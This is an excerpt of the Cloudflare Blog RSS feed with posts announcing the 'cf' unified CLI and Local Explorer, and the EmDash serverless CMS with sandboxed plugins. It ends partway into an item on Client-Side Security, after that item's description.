
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/">
    <channel>
        <title><![CDATA[ The Cloudflare Blog ]]></title>
        <description><![CDATA[ Get the latest news on how products at Cloudflare are built, technologies used, and join the teams helping to build a better Internet. ]]></description>
        <link>https://blog.cloudflare.com</link>
        <atom:link href="https://blog.cloudflare.com/" rel="self" type="application/rss+xml"/>
        <language>en-us</language>
        
        <lastBuildDate>Mon, 13 Apr 2026 18:10:22 GMT</lastBuildDate>
        <item>
            <title><![CDATA[Building a CLI for all of Cloudflare]]></title>
            <link>https://blog.cloudflare.com/cf-cli-local-explorer/</link>
            <pubDate>Mon, 13 Apr 2026 14:29:45 GMT</pubDate>
            <description><![CDATA[ We’re introducing cf, a new unified CLI designed for consistency across the Cloudflare platform, alongside Local Explorer for debugging local data. These tools simplify how developers and AI agents interact with our nearly 3,000 API operations.
 ]]></description>
            <content:encoded><![CDATA[ <p>Cloudflare has a vast API surface. We have over 100 products, and nearly 3,000 HTTP API operations.</p><p>Increasingly, agents are the primary customer of our APIs. Developers bring their coding agents to build and deploy <a href="https://workers.cloudflare.com/solutions/frontends"><u>applications</u></a>, <a href="https://workers.cloudflare.com/solutions/ai"><u>agents</u></a>, and <a href="https://workers.cloudflare.com/solutions/platforms"><u>platforms</u></a> to Cloudflare, configure their account, and query our APIs for analytics and logs.</p><p>We want to make every Cloudflare product available in all of the ways agents need. For example, we now make Cloudflare’s entire API available in a single Code Mode MCP server that uses <a href="https://blog.cloudflare.com/code-mode-mcp/"><u>less than 1,000 tokens</u></a>. There’s a lot more surface area to cover, though: <a href="https://developers.cloudflare.com/workers/wrangler/commands/"><u>CLI commands</u></a>. <a href="https://blog.cloudflare.com/workers-environment-live-object-bindings/"><u>Workers Bindings</u></a> — including APIs for local development and testing. <a href="https://developers.cloudflare.com/fundamentals/api/reference/sdks/"><u>SDKs</u></a> across multiple languages. Our <a href="https://developers.cloudflare.com/workers/wrangler/configuration/"><u>configuration file</u></a>. <a href="https://developers.cloudflare.com/terraform/"><u>Terraform</u></a>. <a href="https://developers.cloudflare.com/"><u>Developer docs</u></a>. <a href="https://developers.cloudflare.com/api/"><u>API docs</u></a> and OpenAPI schemas. <a href="https://github.com/cloudflare/skills"><u>Agent Skills</u></a>.</p><p>Today, many of our products aren’t available across every one of these interfaces. This is particularly true of our CLI — <a href="https://developers.cloudflare.com/workers/wrangler/"><u>Wrangler</u></a>. Many Cloudflare products have no CLI commands in Wrangler. And agents love CLIs.</p><p>So we’ve been rebuilding Wrangler CLI, to make it the CLI for all of Cloudflare. It provides commands for all Cloudflare products, and lets you configure them together using infrastructure-as-code.</p><p>Today we’re sharing an early version of what the next version of Wrangler will look like as a technical preview. It’s very early, but we get the best feedback when we work in public.</p><p>You can try the Technical Preview today by running <code>npx cf</code>. Or you can install it globally by running <code>npm install -g cf</code>.</p><p>Right now, cf provides commands for just a small subset of Cloudflare products. We’re already testing a version of cf that supports the entirety of the Cloudflare API surface — and we will be intentionally reviewing and tuning the commands for each product, to have output that is ergonomic for both agents and humans. To be clear, this Technical Preview is just a small piece of the future Wrangler CLI. Over the coming months we will bring this together with the parts of Wrangler you know and love.</p><p>To build this in a way that keeps in sync with the rapid pace of product development at Cloudflare, we had to create a new system that allows us to generate commands, configuration, binding APIs, and more.</p>
    <div>
      <h2>Rethinking schemas and our code generation pipeline from first principles</h2>
      <a href="#rethinking-schemas-and-our-code-generation-pipeline-from-first-principles">
        
      </a>
    </div>
    <p>We already generate the Cloudflare <a href="https://blog.cloudflare.com/lessons-from-building-an-automated-sdk-pipeline/"><u>API SDKs</u></a>, <a href="https://blog.cloudflare.com/automatically-generating-cloudflares-terraform-provider/"><u>Terraform provider</u></a>, and <a href="https://blog.cloudflare.com/code-mode-mcp/"><u>Code Mode MCP server</u></a> based on the OpenAPI schema for Cloudflare API. But updating our CLI, Workers Bindings, wrangler.jsonc configuration, Agent Skills, dashboard and docs is still a manual process. This was already error-prone, required too much back and forth, and wouldn’t scale to support the whole Cloudflare API in the next version of our CLI.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2wjmgUzBkjeI0RtyXKIMXm/f7fc6ce3b7323aacb3babdfb461f383f/BLOG-3224_2.png" />
          </figure><p>To do this, we needed more than could be expressed in an OpenAPI schema. OpenAPI schemas describe REST APIs, but we have interactive CLI commands that involve multiple actions that combine both local development and API requests, Workers bindings expressed as RPC APIs, along with Agent Skills and documentation that ties this all together.</p><p>We write a lot of TypeScript at Cloudflare. It’s the lingua franca of software engineering. And we keep finding that it just works better to express APIs in TypeScript — as we do with <a href="https://blog.cloudflare.com/capnweb-javascript-rpc-library/"><u>Cap n’ Web</u></a>, <a href="https://blog.cloudflare.com/code-mode/"><u>Code Mode</u></a>, and the <a href="https://developers.cloudflare.com/workers/runtime-apis/rpc/"><u>RPC system</u></a> built into the Workers platform.</p><p>So we introduced a new TypeScript schema that can define the full scope of APIs, CLI commands and arguments, and context needed to generate any interface. The schema format is “just” a set of TypeScript types with conventions, linting, and guardrails to ensure consistency. But because it is our own format, it can easily be adapted to support any interface we need, today or in the future, while still <i>also</i> being able to generate an OpenAPI schema:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4H0xSIPMmrixUWsFL86RUJ/998b93a465d26d856885b4d833ac19d4/BLOG-3224_3.png" />
          </figure><p>To date most of our focus has been at this layer — building the machine we needed, so that we can now start building the CLI and other interfaces we’ve wanted for years to be able to provide. This lets us start to dream bigger about what we could standardize across Cloudflare and make better for Agents — especially when it comes to context engineering our CLI.</p>
    <div>
      <h2>Agents and CLIs — consistency and context engineering</h2>
      <a href="#agents-and-clis-consistency-and-context-engineering">
        
      </a>
    </div>
    <p>Agents expect CLIs to be consistent. If one command uses <code>&lt;command&gt; info</code> as the syntax for getting information about a resource, and another uses <code>&lt;command&gt; get</code>, the agent will expect one and call a non-existent command for the other. In a large engineering org of hundreds or thousands of people, and with many products, manually enforcing consistency through reviews is Swiss cheese. And you can enforce it at the CLI layer, but then naming differs between the CLI, REST API and SDKs, making the problem arguably worse.</p><p>One of the first things we’ve done is to start creating rules and guardrails, enforced at the schema layer. It’s always <code>get</code>, never <code>info</code>. Always <code>--force</code>, never <code>--skip-confirmations</code>. Always <code>--json</code>, never <code>--format</code>, and always supported across commands. </p><p>Wrangler CLI is also fairly unique — it provides commands and configuration that can work with both simulated local resources, or remote resources, like <a href="https://developers.cloudflare.com/d1/"><u>D1 databases</u></a>, <a href="https://developers.cloudflare.com/r2"><u>R2 storage buckets</u></a>, and <a href="https://developers.cloudflare.com/kv"><u>KV namespaces</u></a>. This means consistent defaults matter even more. If an agent thinks it’s modifying a remote database, but is actually adding records to local database, and the developer is using remote bindings to develop locally against a remote database, their agent won’t understand why the newly-added records aren’t showing up when the agent makes a request to the local dev server. Consistent defaults, along with output that clearly signals whether commands are applied to remote or local resources, ensure agents have explicit guidance.</p>
    <div>
      <h2>Local Explorer — what you can do remotely, you can now do locally</h2>
      <a href="#local-explorer-what-you-can-do-remotely-you-can-now-do-locally">
        
      </a>
    </div>
    <p>Today we are also releasing Local Explorer, a new feature available in open beta in both Wrangler and the Cloudflare Vite plugin.</p><p>Local Explorer lets you introspect the simulated resources that your Worker uses when you are developing locally, including <a href="https://www.cloudflare.com/developer-platform/products/workers-kv/"><u>KV</u></a>, <a href="https://www.cloudflare.com/developer-platform/products/r2/"><u>R2</u></a>, D1, <a href="https://www.cloudflare.com/developer-platform/products/durable-objects/"><u>Durable Objects</u></a> and <a href="https://www.cloudflare.com/developer-platform/products/workflows/"><u>Workflows</u></a>. The same things you can do via the Cloudflare API and Dashboard with each of these, you can also do entirely locally, powered by the same underlying API structure.</p><p>For years we’ve <a href="https://blog.cloudflare.com/wrangler3/"><u>made a bet on fully local development</u></a> — not just for Cloudflare Workers, but for the entire platform. When you use D1, even though D1 is a hosted, serverless database product, you can run your database and communicate with it via bindings entirely locally, without any extra setup or tooling. Via <a href="https://developers.cloudflare.com/workers/testing/miniflare/"><u>Miniflare</u></a>, our local development platform emulator, the Workers runtime provides the exact same APIs in local dev as in production, and uses a local SQLite database to provide the same functionality. This makes it easy to write and run tests that run fast, without the need for network access, and work offline.</p><p>But until now, working out what data was stored locally required you to reverse engineer, introspect the contents of the <code>.wrangler/state</code> directory, or install third-party tools.</p><p>Now whenever you run an app with Wrangler CLI or the Cloudflare Vite plugin, you will be prompted to open the local explorer (keyboard shortcut <code>e</code>). This provides you with a simple, local interface to see what bindings your Worker currently has attached, and what data is stored against them.</p><div>
  
</div><p>When you build using Agents, Local Explorer is a great way to understand what the agent is doing with data, making the local development cycle much more interactive. You can turn to Local Explorer anytime you need to verify a schema, seed some test records, or just start over and <code>DROP TABLE</code>.</p><p>Our goal here is to provide a mirror of the Cloudflare API that only modifies local data, so that all of your local resources are available via the same APIs that you use remotely. And by making the API shape match across local and remote, when you run CLI commands in the upcoming version of the CLI and pass a <code>--local</code> flag, the commands just work. The only difference is that the command makes a request to this local mirror of the Cloudflare API instead.</p><p>Starting today, this API is available at <code>/cdn-cgi/explorer/api</code> on any Wrangler- or Vite Plugin- powered application. By pointing your agent at this address, it will find an OpenAPI specification to be able to manage your local resources for you, just by talking to your agent.</p>
    <div>
      <h2>Tell us your hopes and dreams for a Cloudflare-wide CLI </h2>
      <a href="#tell-us-your-hopes-and-dreams-for-a-cloudflare-wide-cli">
        
      </a>
    </div>
    <p>Now that we have built the machine, it’s time to take the best parts of Wrangler today, combine them with what’s now possible, and make Wrangler the best CLI possible for using all of Cloudflare.</p><p>You can try the technical preview today by running <code>npx cf</code>. Or you can install it globally by running npm <code>install -g cf</code>.</p><p>With this very early version, we want your feedback — not just about what the technical preview does today, but what you want from a CLI for Cloudflare’s entire platform. Tell us what you wish was an easy one-line CLI command but takes a few clicks in our dashboard today. What you wish you could configure in <code>wrangler.jsonc</code> — like DNS records or Cache Rules. And where you’ve seen your agents get stuck, and what commands you wish our CLI provided for your agent to use.</p><p>Jump into the <a href="https://discord.cloudflare.com/"><u>Cloudflare Developers Discord</u></a> and tell us what you’d like us to add first to the CLI, and stay tuned for many more updates soon.</p><p><i>Thanks to Emily Shen for her valuable contributions to kicking off the Local Explorer project.</i></p> ]]></content:encoded>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[D1]]></category>
            <category><![CDATA[API]]></category>
            <category><![CDATA[Agents Week]]></category>
            <guid isPermaLink="false">5r3Nx1IDtp6B6GRDHqQyWL</guid>
            <dc:creator>Matt “TK” Taylor</dc:creator>
            <dc:creator>Dimitri Mitropoulos</dc:creator>
            <dc:creator>Dan Carter</dc:creator>
        </item>
        <item>
            <title><![CDATA[Introducing EmDash — the spiritual successor to WordPress that solves plugin security]]></title>
            <link>https://blog.cloudflare.com/emdash-wordpress/</link>
            <pubDate>Wed, 01 Apr 2026 13:00:00 GMT</pubDate>
            <description><![CDATA[ Today we are launching the beta of EmDash, a full-stack serverless JavaScript CMS built on Astro 6.0. It combines the features of a traditional CMS with modern security, running plugins in sandboxed Worker isolates. ]]></description>
            <content:encoded><![CDATA[ <p></p><p>The cost of building software has drastically decreased. We recently <a href="https://blog.cloudflare.com/vinext/"><u>rebuilt Next.js in one week</u></a> using AI coding agents. But for the past two months our agents have been working on an even more ambitious project: rebuilding the WordPress open source project from the ground up.</p><p>WordPress powers <a href="https://w3techs.com/technologies/details/cm-wordpress"><u>over 40% of the Internet</u></a>. It is a massive success that has enabled anyone to be a publisher, and created a global community of WordPress developers. But the WordPress open source project will be 24 years old this year. Hosting a website has changed dramatically during that time. When WordPress was born, AWS EC2 didn’t exist. In the intervening years, that task has gone from renting virtual private servers, to uploading a JavaScript bundle to a globally distributed network at virtually no cost. It’s time to upgrade the most popular CMS on the Internet to take advantage of this change.</p><p>Our name for this new CMS is EmDash. We think of it as the spiritual successor to WordPress. It’s written entirely in TypeScript. It is serverless, but you can run it on your own hardware or any platform you choose. Plugins are securely sandboxed and can run in their own <a href="https://developers.cloudflare.com/workers/reference/how-workers-works/"><u>isolate</u></a>, via <a href="https://developers.cloudflare.com/workers/runtime-apis/bindings/worker-loader/"><u>Dynamic Workers</u></a>, solving the fundamental security problem with the WordPress plugin architecture. And under the hood, EmDash is powered by <a href="https://astro.build/"><u>Astro</u></a>, the fastest web framework for content-driven websites.</p><p>EmDash is fully open source, MIT licensed, and <a href="https://github.com/emdash-cms/emdash"><u>available on GitHub</u></a>. While EmDash aims to be compatible with WordPress functionality, no WordPress code was used to create EmDash. That allows us to license the open source project under the more permissive MIT license. We hope that allows more developers to adapt, extend, and participate in EmDash’s development.</p><p>You can deploy the EmDash v0.1.0 preview to your own Cloudflare account, or to any Node.js server today as part of our early developer beta:</p><a href="https://deploy.workers.cloudflare.com/?url=https://github.com/emdash-cms/templates/tree/main/blog-cloudflare"><img src="https://deploy.workers.cloudflare.com/button" /></a>
<p></p><p>Or you can try out the admin interface here in the <a href="https://emdashcms.com/"><u>EmDash Playground</u></a>:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/50n8mewREzoxOFq2jDzpT9/6a38dbfbaeec2d21040137e574a935ad/CleanShot_2026-04-01_at_07.45.29_2x.png" />
          </figure>
    <div>
      <h3>What WordPress has accomplished</h3>
      <a href="#what-wordpress-has-accomplished">
        
      </a>
    </div>
    <p>The story of WordPress is a triumph of open source that enabled publishing at a scale never before seen. Few projects have had the same recognisable impact on the generation raised on the Internet. The contributors to WordPress’s core, and its many thousands of plugin and theme developers have built a platform that democratised publishing for millions; many lives and livelihoods being transformed by this ubiquitous software.</p><p>There will always be a place for WordPress, but there is also a lot more space for the world of content publishing to grow. A decade ago, people picking up a keyboard universally learned to publish their blogs with WordPress. Today it’s just as likely that person picks up Astro, or another TypeScript framework to learn and build with. The ecosystem needs an option that empowers a wide audience, in the same way it needed WordPress 23 years ago. </p><p>EmDash is committed to building on what WordPress created: an open source publishing stack that anyone can install and use at little cost, while fixing the core problems that WordPress cannot solve. </p>
    <div>
      <h3>Solving the WordPress plugin security crisis</h3>
      <a href="#solving-the-wordpress-plugin-security-crisis">
        
      </a>
    </div>
    <p>WordPress’ plugin architecture is fundamentally insecure. <a href="https://patchstack.com/whitepaper/state-of-wordpress-security-in-2025/"><u>96% of security issues</u></a> for WordPress sites originate in plugins. In 2025, more high severity vulnerabilities <a href="https://patchstack.com/whitepaper/state-of-wordpress-security-in-2026/"><u>were found in the WordPress ecosystem</u></a> than the previous two years combined.</p><p>Why, after over two decades, is WordPress plugin security so problematic?</p><p>A WordPress plugin is a PHP script that hooks directly into WordPress to add or modify functionality. There is no isolation: a WordPress plugin has direct access to the WordPress site’s database and filesystem. When you install a WordPress plugin, you are trusting it with access to nearly everything, and trusting it to handle every malicious input or edge case perfectly.</p><p>EmDash solves this. In EmDash, each plugin runs in its own isolated sandbox: a <a href="https://developers.cloudflare.com/dynamic-workers/"><u>Dynamic Worker</u></a>. Rather than giving direct access to underlying data, EmDash provides the plugin with <a href="https://blog.cloudflare.com/workers-environment-live-object-bindings/"><u>capabilities via bindings</u></a>, based on what the plugin explicitly declares that it needs in its manifest. This security model has a strict guarantee: an EmDash plugin can only perform the actions explicitly declared in its manifest. You can know and trust upfront, before installing a plugin, exactly what you are granting it permission to do, similar to going through an OAuth flow and granting a 3rd party app a specific set of scoped permissions.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4JDq2oEgwONHL8uUJsrof2/fb2ae5fcacd5371aaab575c35ca2ce2e/image8.png" />
          </figure><p>For example, a plugin that sends an email after a content item gets saved looks like this:</p>
            <pre><code>import { definePlugin } from "emdash";

export default () =&gt;
  definePlugin({
    id: "notify-on-publish",
    version: "1.0.0",
    capabilities: ["read:content", "email:send"],
    hooks: {
      "content:afterSave": async (event, ctx) =&gt; {
        if (event.collection !== "posts" || event.content.status !==    "published") return;

        await ctx.email!.send({
          to: "editors@example.com",
          subject: `New post published: ${event.content.title}`,
          text: `"${event.content.title}" is now live.`,
         });

        ctx.log.info(`Notified editors about ${event.content.id}`);
      },
    },
  });</code></pre>
            <p>This plugin explicitly requests two capabilities: <code>content:afterSave</code> to hook into the content lifecycle, and <code>email:send</code> to access the <code>ctx.email</code> function. It is impossible for the plugin to do anything other than use these capabilities. It has no external network access. If it does need network access, it can specify the exact hostname it needs to talk to, as part of its definition, and be granted only the ability to communicate with a particular hostname.</p><p>And in all cases, because the plugin’s needs are declared statically, upfront, it can always be clear exactly what the plugin is asking for permission to be able to do, at install time. A platform or administrator could define rules for what plugins are or aren’t allowed to be installed by certain groups of users, based on what permissions they request, rather than an allowlist of approved or safe plugins.</p>
    <div>
      <h3>Solving plugin security means solving marketplace lock-in</h3>
      <a href="#solving-plugin-security-means-solving-marketplace-lock-in">
        
      </a>
    </div>
    <p>WordPress plugin security is such a real risk that WordPress.org <a href="https://developer.wordpress.org/plugins/wordpress-org/plugin-developer-faq/#where-do-i-submit-my-plugin"><u>manually reviews and approves each plugin</u></a> in its marketplace. At the time of writing, that review queue is over 800 plugins long, and takes at least two weeks to traverse. The vulnerability surface area of WordPress plugins is so wide that in practice, all parties rely on marketplace reputation, ratings and reviews. And because WordPress plugins run in the same execution context as WordPress itself and are so deeply intertwined with WordPress code, some argue they must carry forward WordPress’ GPL license.</p><p>These realities combine to create a chilling effect on developers building plugins, and on platforms hosting WordPress sites.</p><p>Plugin security is the root of this problem. Marketplace businesses provide trust when parties otherwise cannot easily trust each other. In the case of the WordPress marketplace, the plugin security risk is so large and probable that many of your customers can only reasonably trust your plugin via the marketplace. But in order to be part of the marketplace your code must be licensed in a way that forces you to give it away for free everywhere other than that marketplace. You are locked in.</p><p>EmDash plugins have two important properties that mitigate this marketplace lock-in:</p><ol><li><p><b>Plugins can have any license</b>: they run independently of EmDash and share no code. It’s the plugin author’s choice.</p></li><li><p><b>Plugin code runs independently in a secure sandbox</b>: a plugin can be provided to an EmDash site, and trusted, without the EmDash site ever seeing the code.</p></li></ol><p>The first part is straightforward — as the plugin author, you choose what license you want. The same way you can when publishing to NPM, PyPi, Packagist or any other registry. It’s an open ecosystem for all, and up to the community, not the EmDash project, what license you use for plugins and themes.</p><p>The second part is where EmDash’s plugin architecture breaks free of the centralized marketplace.</p><p>Developers need to rely on a third party marketplace having vetted the plugin far less to be able to make decisions about whether to use or trust it. Consider the example plugin above that sends emails after content is saved; the plugin declares three things:</p><ul><li><p>It only runs on the <code>content:afterSave</code> hook</p></li><li><p>It has the <code>read:content</code> capability</p></li><li><p>It has the <code>email:send</code> capability</p></li></ul><p>The plugin can have tens of thousands of lines of code in it, but unlike a WordPress plugin that has access to everything and can talk to the public Internet, the person adding the plugin knows exactly what access they are granting to it. The clearly defined boundaries allow you to make informed decisions about security risks and to zoom in on more specific risks that relate directly to the capabilities the plugin is given.</p><p>The more that both sites and platforms can trust the security model to provide constraints, the more that sites and platforms can trust plugins, and break free of centralized control of marketplaces and reputation. Put another way: if you trust that food safety is enforced in your city, you’ll be adventurous and try new places. If you can’t trust that there might be a staple in your soup, you’ll be consulting Google before every new place you try, and it’s harder for everyone to open new restaurants.</p>
    <div>
      <h3>Every EmDash site has x402 support built in — charge for access to content</h3>
      <a href="#every-emdash-site-has-x402-support-built-in-charge-for-access-to-content">
        
      </a>
    </div>
    <p>The business model of the web <a href="https://blog.cloudflare.com/content-independence-day-no-ai-crawl-without-compensation/"><u>is at risk</u></a>, particularly for content creators and publishers. The old way of making content widely accessible, allowing all clients free access in exchange for traffic, breaks when there is no human looking at a site to advertise to, and the client is instead their agent accessing the web on their behalf. Creators need ways to continue to make money in this new world of agents, and to build new kinds of websites that serve what people’s agents need and will pay for. Decades ago a new wave of creators created websites that became great businesses (often using WordPress to power them) and a similar opportunity exists today.</p><p><a href="https://www.x402.org/"><u>x402</u></a> is an open, neutral standard for Internet-native payments. It lets anyone on the Internet easily charge, and any client pay on-demand, on a pay-per-use basis. A client, such as an agent, sends a HTTP request and receives a HTTP 402 Payment Required status code. In response, the client pays for access on-demand, and the server can let the client through to the requested content.</p><p>EmDash has built-in support for x402. This means anyone with an EmDash site can charge for access to their content without requiring subscriptions and with zero engineering work. All you need to do is configure which content should require payment, set how much to charge, and provide a Wallet address. The request/response flow ends up looking like this:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3IKfYGHF6Pgi3jQf1ERRQC/48815ffec3e204f4f2c6f7a40f232a93/image4.png" />
          </figure><p>Every EmDash site has a built-in business model for the AI era.</p>
    <div>
      <h3>Solving scale-to-zero for WordPress hosting platforms</h3>
      <a href="#solving-scale-to-zero-for-wordpress-hosting-platforms">
        
      </a>
    </div>
    <p>WordPress is not serverless: it requires provisioning and managing servers, scaling them up and down like a traditional web application. To maximize performance, and to be able to handle traffic spikes, there’s no avoiding the need to pre-provision instances and run some amount of idle compute, or share resources in ways that limit performance. This is particularly true for sites with content that must be server rendered and cannot be cached.</p><p>EmDash is different: it’s built to run on serverless platforms, and make the most out of the <a href="https://developers.cloudflare.com/workers/reference/how-workers-works/"><u>v8 isolate architecture</u></a> of Cloudflare’s open source runtime <a href="https://github.com/cloudflare/workerd"><u>workerd</u></a>. On an incoming request, the Workers runtime instantly spins up an isolate to execute code and serve a response. It scales back down to zero if there are no requests. And it <a href="https://blog.cloudflare.com/workers-pricing-scale-to-zero/"><u>only bills for CPU time</u></a> (time spent doing actual work).</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3yIX0whveiJ7xQ9P20TeyA/84462e6ec58cab27fbd6bf1703efeabc/image7.png" />
          </figure><p>You can run EmDash anywhere, on any Node.js server — but on Cloudflare you can run millions of instances of EmDash using <a href="https://developers.cloudflare.com/cloudflare-for-platforms/"><u>Cloudflare for Platforms</u></a> that each instantly scale fully to zero or up to as many RPS as you need to handle, using the exact same network and runtime that the biggest websites in the world rely on.</p><p>Beyond cost optimizations and performance benefits, we’ve bet on this architecture at Cloudflare in part because we believe in having low cost and free tiers, and that everyone should be able to build websites that scale. We’re excited to help platforms extend the benefits of this architecture to their own customers, both big and small.</p>
    <div>
      <h3>Modern frontend theming and architecture via Astro</h3>
      <a href="#modern-frontend-theming-and-architecture-via-astro">
        
      </a>
    </div>
    <p>EmDash is powered by Astro, the web framework for content-driven websites. To create an EmDash theme, you create an Astro project that includes:</p><ul><li><p><b>Pages</b>: Astro routes for rendering content (homepage, blog posts, archives, etc.)</p></li><li><p><b>Layouts:</b> Shared HTML structure</p></li><li><p><b>Components:</b> Reusable UI elements (navigation, cards, footers)</p></li><li><p><b>Styles:</b> CSS or Tailwind configuration</p></li><li><p><b>A seed file:</b> JSON that tells the CMS what content types and fields to create</p></li></ul><p>This makes creating themes familiar to frontend developers who are <a href="https://npm-stat.com/charts.html?package=astro&amp;from=2024-01-01&amp;to=2026-03-30"><u>increasingly choosing Astro</u></a>, and to LLMs which are already trained on Astro.</p><p>WordPress themes, though incredibly flexible, operate with a lot of the same security risks as plugins, and the more popular and commonplace your theme, the more of a target it is. Themes run through integrating with <code>functions.php</code> which is an all-encompassing execution environment, enabling your theme to be both incredibly powerful and potentially dangerous. EmDash themes, as with dynamic plugins, turns this expectation on its head. Your theme can never perform database operations.</p>
    <div>
      <h3>An AI Native CMS — MCP, CLI, and Skills for EmDash</h3>
      <a href="#an-ai-native-cms-mcp-cli-and-skills-for-emdash">
        
      </a>
    </div>
    <p>The least fun part about working with any CMS is doing the rote migration of content: finding and replacing strings, migrating custom fields from one format to another, renaming, reordering and moving things around. This is either boring repetitive work or requires one-off scripts and  “single-use” plugins and tools that are usually neither fun to write nor to use.</p><p>EmDash is designed to be managed programmatically by your AI agents. It provides the context and the tools that your agents need, including:</p><ol><li><p><b>Agent Skills:</b> Each EmDash instance includes <a href="https://agentskills.io/home"><u>Agent Skills</u></a> that describe to your agent the capabilities EmDash can provide to plugins, the hooks that can trigger plugins, <a href="https://github.com/emdash-cms/emdash/blob/main/skills/creating-plugins/SKILL.md"><u>guidance on how to structure a plugin</u></a>, and even <a href="https://github.com/emdash-cms/emdash/blob/main/skills/wordpress-theme-to-emdash/SKILL.md"><u>how to port legacy WordPress themes to EmDash natively</u></a>. When you give an agent an EmDash codebase, EmDash provides everything the agent needs to be able to customize your site in the way you need.</p></li><li><p><b>EmDash CLI:</b> The <a href="https://github.com/emdash-cms/emdash/blob/main/docs/src/content/docs/reference/cli.mdx"><u>EmDash CLI</u></a> enables your agent to interact programmatically with your local or remote instance of EmDash. You can <a href="https://github.com/emdash-cms/emdash/blob/main/docs/src/content/docs/reference/cli.mdx#media-upload-file"><u>upload media</u></a>, <a href="https://github.com/emdash-cms/emdash/blob/main/docs/src/content/docs/reference/cli.mdx#emdash-search"><u>search for content</u></a>, <a href="https://github.com/emdash-cms/emdash/blob/main/docs/src/content/docs/reference/cli.mdx#schema-create-collection"><u>create and manage schemas</u></a>, and do the same set of things you can do in the Admin UI.</p></li><li><p><b>Built-in MCP Server:</b> Every EmDash instance provides its own remote Model Context Protocol (MCP) server, allowing you to do the same set of things you can do in the Admin UI.</p></li></ol>
    <div>
      <h3>Pluggable authentication, with Passkeys by default</h3>
      <a href="#pluggable-authentication-with-passkeys-by-default">
        
      </a>
    </div>
    <p>EmDash uses passkey-based authentication by default, meaning there are no passwords to leak and no brute-force vectors to defend against. User management includes familiar role-based access control out of the box: administrators, editors, authors, and contributors, each scoped strictly to the actions they need. Authentication is pluggable, so you can set EmDash up to work with your SSO provider, and automatically provision access based on IdP metadata.</p>
    <div>
      <h3>Import your WordPress sites to EmDash</h3>
      <a href="#import-your-wordpress-sites-to-emdash">
        
      </a>
    </div>
    <p>You can import an existing WordPress site by either going to WordPress admin and exporting a WXR file, or by installing the <a href="https://github.com/emdash-cms/wp-emdash/tree/main/plugins/emdash-exporter"><u>EmDash Exporter plugin</u></a> on a WordPress site, which configures a secure endpoint that is only exposed to you, and protected by a WordPress Application Password you control. Migrating content takes just a few minutes, and automatically works to bring any attached media into EmDash’s media library.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/SUFaWUIoEFSN2z9rclKZW/28870489d502cff34e35ab3b59f19eae/image1.png" />
          </figure><p>Creating any custom content types on WordPress that are not a Post or a Page has meant installing heavy plugins like Advanced Custom Fields, and squeezing the result into a crowded WordPress posts table. EmDash does things differently: you can define a schema directly in the admin panel, which will create entirely new EmDash collections for you, separately ordered in the database. On import, you can use the same capabilities to take any custom post types from WordPress, and create an EmDash content type from it. </p><p>For bespoke blocks, you can use the <a href="https://github.com/emdash-cms/emdash/blob/main/skills/creating-plugins/references/block-kit.md"><u>EmDash Block Kit Agent Skill</u></a> to instruct your agent of choice and build them for EmDash.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5xutdF9nvHYMYlN6XfqRGu/1db0e0d73327e926d606f92fdd7aabec/image3.png" />
          </figure>
    <div>
      <h3>Try it</h3>
      <a href="#try-it">
        
      </a>
    </div>
    <p>EmDash is v0.1.0 preview, and we’d love you to try it, give feedback, and we welcome contributions to the <a href="https://github.com/emdash-cms/emdash/"><u>EmDash GitHub repository</u></a>.</p><p>If you’re just playing around and want to first understand what’s possible — try out the admin interface in the <a href="https://emdashcms.com/"><u>EmDash Playground</u></a>.</p><p>To create a new EmDash site locally, via the CLI, run:</p><p><code>npm create emdash@latest</code></p><p>Or you can do the same via the Cloudflare dashboard below:</p><a href="https://deploy.workers.cloudflare.com/?url=https://github.com/emdash-cms/templates/tree/main/blog-cloudflare"><img src="https://deploy.workers.cloudflare.com/button" /></a>
<p></p><p>We’re excited to see what you build, and if you're active in the WordPress community, as a hosting platform, a plugin or theme author, or otherwise — we’d love to hear from you. Email us at emdash@cloudflare.com, and tell us what you’d like to see from the EmDash project.</p><p>If you want to stay up to date with major EmDash developments, you can leave your email address <a href="https://forms.gle/ofE1LYRYxkpAPqjE7"><u>here</u></a>.</p> ]]></content:encoded>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Open Source]]></category>
            <category><![CDATA[Product News]]></category>
            <guid isPermaLink="false">64rkKr9jewVmxagIFgbwY4</guid>
            <dc:creator>Matt “TK” Taylor</dc:creator>
            <dc:creator>Matt Kane</dc:creator>
        </item>
        <item>
            <title><![CDATA[Cloudflare Client-Side Security: smarter detection, now open to everyone]]></title>
            <link>https://blog.cloudflare.com/client-side-security-open-to-everyone/</link>
            <pubDate>Mon, 30 Mar 2026 06:00:00 GMT</pubDate>
            <description><![CDATA[ We are opening our advanced Client-Side Security tools to all users, featuring a new cascading AI detection system. By combining graph neural networks and LLMs, we've reduced false positives by up to 200x while catching sophisticated zero-day exploits. ]]></description>
